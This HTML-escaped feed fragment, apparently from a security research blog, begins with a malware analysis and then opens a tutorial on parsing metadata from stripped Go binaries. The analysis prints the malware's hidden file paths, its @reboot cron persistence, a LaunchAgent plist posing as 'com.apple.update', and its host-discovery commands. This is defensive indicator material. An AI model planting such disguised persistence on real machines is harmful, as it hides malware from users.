/.Library/log.txt&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Persistence&lt;span class="hx:absolute hx:-mt-20" id="persistence-1"&gt;&lt;/span&gt;
&lt;a href="#persistence-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Creates the cron job:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;@reboot (/.Library/SystemServices/updateSystem)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Commands&lt;span class="hx:absolute hx:-mt-20" id="commands-1"&gt;&lt;/span&gt;
&lt;a href="#commands-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;crontab -l &lt;span class="p"&gt;|&lt;/span&gt; egrep -v &lt;span class="s2"&gt;&amp;#34;^(#|&lt;/span&gt;$&lt;span class="s2"&gt;)&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep -e &lt;span class="s2"&gt;&amp;#34;@reboot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;(/.Library/SystemServices/updateSystem)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;cp -rf &amp;lt;sample name&amp;gt; /.Library/SystemServices/updateSystem
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nohup &lt;span class="s1"&gt;&amp;#39;/.Library/SystemServices/updateSystem&amp;#39;&lt;/span&gt; &amp;gt;/dev/null 2&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ifconfig &lt;span class="p"&gt;|&lt;/span&gt; grep -v 127.0.0.1 &lt;span class="p"&gt;|&lt;/span&gt; grep -E &lt;span class="s2"&gt;&amp;#34;inet
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; awk &lt;span class="s1"&gt;&amp;#39;{print $2}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ip address &lt;span class="p"&gt;|&lt;/span&gt; awk &lt;span class="s1"&gt;&amp;#39;/ether/{print $2}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;id -u
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;uname -mrs&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Mac&lt;span class="hx:absolute hx:-mt-20" id="mac-1"&gt;&lt;/span&gt;
&lt;a href="#mac-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Files and directories created on the machine&lt;span class="hx:absolute hx:-mt-20" id="files-and-directories-created-on-the-machine-2"&gt;&lt;/span&gt;
&lt;a href="#files-and-directories-created-on-the-machine-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;/Library/MacOsServices
/Library/MacOsServices/updateMacOs
/Library/SystemNetwork
/Library/LaunchAgents/com.apple.update.plist&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Persistence&lt;span class="hx:absolute hx:-mt-20" id="persistence-2"&gt;&lt;/span&gt;
&lt;a href="#persistence-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Creates persistence via LaunchAgent under the path:
&lt;code&gt;/Library/LaunchAgents/com.apple.update.plist&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Content:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;#34;1.0″ encoding=&amp;#34;UTF-8″?&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE plist PUBLIC &amp;#34;-//Apple//DTD PLIST 1.0//EN&amp;#34; &amp;#34;http://www.apple.com/DTDs/PropertyList-1.0.dtd&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;plist&lt;/span&gt; &lt;span class="na"&gt;version=&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;1.0″&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;dict&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;Label&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;com.apple.update&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;LimitLoadToSessionType&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;Aqua&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;ProgramArguments&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;array&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;/Library/MacOsServices/updateMacOs&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/array&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;KeepAlive&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;dict&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;SuccessfulExit&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;true/&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;/dict&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;RunAtLoad&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;lt;true/&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;/dict&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;&amp;lt;/plist&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>All Your Go Binaries are Belong to Us</title><link>https://research.intezer.com/blog/2021/12/all-your-go-binaries-are-belong-to-us/</link><pubDate>Thu, 02 Dec 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/12/all-your-go-binaries-are-belong-to-us/</guid><description>
&lt;p&gt;The skillset of performing binary analysis may to some appear to be limited to
a few undeadly souls. While it may look like a form of dark arts when someone
can read data structures in a raw hex dump, it shouldn&amp;rsquo;t even qualify as a
party trick. To quote
&lt;a href="https://twitter.com/lizthedeveloper/status/1431039239249178627"target="_blank" rel="noopener"&gt;@BizTheDeveloper&amp;rsquo;s mother&lt;/a&gt;,
&amp;ldquo;…reading a hex dump is not that hard…&amp;rdquo; Now, the goal of this post is not to
turn the reader into a hex dump magician. Instead, I want to show that binary
analysis is all about data parsing. If you are a Go developer and are not
interested in the analysis of Go binaries, this post will still have something
for you. Did you know that &amp;ldquo;Go binary analysts&amp;rdquo; know if you organize your
source code neatly or just dump everything into one file? In this post, we will
see how we can extract some of the available hidden metadata in the binaries
produced by the Go compiler. With the extracted data, we will see a few use
cases including how it can be used to determine if the application uses a
vulnerable dependency. The goal is to be able to perform this on &amp;ldquo;production
builds&amp;rdquo; so we are targeting support for stripped binaries. This means we can&amp;rsquo;t
depend on debug information or symbols that normally are included in binaries
produced by the compiler. This may look like something we would need but in
fact, we actually don&amp;rsquo;t. Finally, let&amp;rsquo;s limit us to only using the standard
library and optionally a &amp;ldquo;golang x&amp;rdquo; package.&lt;/p&gt;
&lt;h2&gt;The Debug Package&lt;span class="hx:absolute hx:-mt-20" id="the-debug-package"&gt;&lt;/span&gt;
&lt;a href="#the-debug-package" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;A package that everyone who wants to do some analysis of Go binaries should
know about is the &lt;a href="https://pkg.go.dev/debug"target="_blank" rel="noopener"&gt;&lt;code&gt;debug&lt;/code&gt;&lt;/a&gt; package in the standard
library. The package provides sub-packages to parse ELF (Linux and Unix), PE
(Windows), and Mach-O (macOS) files. In addition to this, it also has useful
functions for parsing some of the data structures we need to process. One good
thing with these functions is that they are not dependent on debug information
or symbols, which means we can use them for stripped &amp;ldquo;production builds.&amp;rdquo;
Finding the structures is a bit harder but unfortunately not something we can
work around. The metadata table we are going to focus on in this section is the
&lt;code&gt;PCLNTAB&lt;/code&gt;. The &lt;code&gt;PCLNTAB&lt;/code&gt; was added in Go 1.2 and holds data needed for Go&amp;rsquo;s
panic messages. The table is used to map between the program counter (location
of an assembly instruction) and the source code file and line number, allowing
a more developer-friendly panic message as it includes where in the source code
the panic occurred. What is also part of this table is a list of all the
function information, including functions that have been eliminated by the
compiler as part of the dead code elimination step. The goal of parsing this
table is to recover all the packages in the Go binary. Before we can process
the table, we need to first find it. This is very easy for ELF and Mach-O files
because the table is located in its own section called &lt;code&gt;.gopclntab&lt;/code&gt;. When it
comes to PE files, the process is a bit less straightforward. The table is
usually located in the &lt;code&gt;.rdata&lt;/code&gt; or &lt;code&gt;.text&lt;/code&gt; section of the PE file. The table
starts with a magic value that can be used to locate the start of the table.
For Go binaries compiled with 1.2 up to excluding 1.16 of the compiler, the
magic value is &lt;code&gt;0xfffffffb&lt;/code&gt;. For files compiled with 1.16 and later the magic
value is &lt;code&gt;0xfffffffa&lt;/code&gt;. To ensure the match is correct we can use
&lt;a href="https://cs.opensource.google/go/go/&amp;#43;/refs/tags/go1.17.3:src/debug/gosym/pclntab.go"target="_blank" rel="noopener"&gt;the same checks&lt;/a&gt;
that the parser function uses to check the table. To parse the table, we will
use the &lt;code&gt;debug/gosym&lt;/code&gt; package. First, we need to create a &lt;code&gt;LineTable&lt;/code&gt; with the
function &lt;a href="https://pkg.go.dev/debug/gosym#NewLineTable"target="_blank" rel="noopener"&gt;&lt;code&gt;NewLineTable&lt;/code&gt;&lt;/a&gt;. Using
the &lt;code&gt;LineTable&lt;/code&gt; we can create a symbol table with the function
&lt;a href="https://pkg.go.dev/debug/gosym#NewTable"target="_blank" rel="noopener"&gt;&lt;code&gt;NewTable&lt;/code&gt;&lt;/a&gt;. The &lt;code&gt;NewTable&lt;/code&gt; function
accepts a byte slice of the symbol table. This argument can be nil which is
good since the symbol table is not available in stripped binaries.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nx"&gt;lt&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;gosym&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;NewLineTable&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;lntabBuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;textStart&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nx"&gt;tab&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;gosym&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;NewTable&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;lt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The definition of the structure returned is shown in the code snippet below.
The structure has really one field which is exported, &lt;code&gt;Funcs&lt;/code&gt; which is a slice
of &lt;a href="https://pkg.go.dev/debug/gosym#Func"target="_blank" rel="noopener"&gt;&lt;code&gt;Func&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Table&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Syms&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="nx"&gt;Sym&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// nil for Go 1.3 and later binaries&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Funcs&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="nx"&gt;Func&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Files&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;map&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nx"&gt;Obj&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// for Go 1.2 and later all files map to one Obj&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Objs&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="nx"&gt;Obj&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// for Go 1.2 and later only one Obj in slice&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// contains filtered or unexported fields&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The &lt;a href="https://pkg.go.dev/debug/gosym#Func"target="_blank" rel="noopener"&gt;&lt;code&gt;Func&lt;/code&gt;&lt;/a&gt; type holds information about
a single function which includes the entry point and where it ends. These
addresses are the memory locations when the file is loaded into memory for
execution and not the offset from the beginning of the file. If the function
has been eliminated by the compiler, the entry has a value of &lt;code&gt;uint64(0)&lt;/code&gt;. The
&lt;code&gt;Func&lt;/code&gt; structure also includes a pointer to the underlying symbol. Via the
&lt;a href="https://pkg.go.dev/debug/gosym#Sym"target="_blank" rel="noopener"&gt;&lt;code&gt;Sym&lt;/code&gt;&lt;/a&gt;, we can access the name of the
function via the method
&lt;a href="https://pkg.go.dev/debug/gosym#Sym.BaseName"target="_blank" rel="noopener"&gt;&lt;code&gt;BaseName&lt;/code&gt;&lt;/a&gt; and the package it
belongs to via the method
&lt;a href="https://pkg.go.dev/debug/gosym#Sym.PackageName"target="_blank" rel="noopener"&gt;&lt;code&gt;PackageName&lt;/code&gt;&lt;/a&gt;. If the &lt;code&gt;Func&lt;/code&gt;
is a method attached to a type, the method
&lt;a href="https://pkg.go.dev/debug/gosym#Sym.ReceiverName"target="_blank" rel="noopener"&gt;&lt;code&gt;ReceiverName&lt;/code&gt;&lt;/a&gt; returns the
string name of the receiver. Otherwise, it returns an empty string. Using this
information, we can iterate through all functions to discover which packages
are used and which functions are reachable (according to the Go compiler&amp;rsquo;s dead
code elimination logic). Additional logic based on heuristics to determine if
the package is part of the standard library, a dependency, or the main module
can be used to sort the packages.&lt;/p&gt;
&lt;h2&gt;Build Information&lt;span class="hx:absolute hx:-mt-20" id="build-information"&gt;&lt;/span&gt;
&lt;a href="#build-information" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;With the introduction of the module system, there is another way of enumerating
the packages used when compiling a Go program. While this information is only
available in binaries compiled with &lt;code&gt;go mod&lt;/code&gt; enabled, the data is richer. The
build info structure is available as a separate section in ELF and Mach-O
files. The section name is &lt;code&gt;.go.buildinfo&lt;/code&gt;. For PE files this data is stored
inside one of the data sections. It&amp;rsquo;s a small data structure of 32-bytes. An
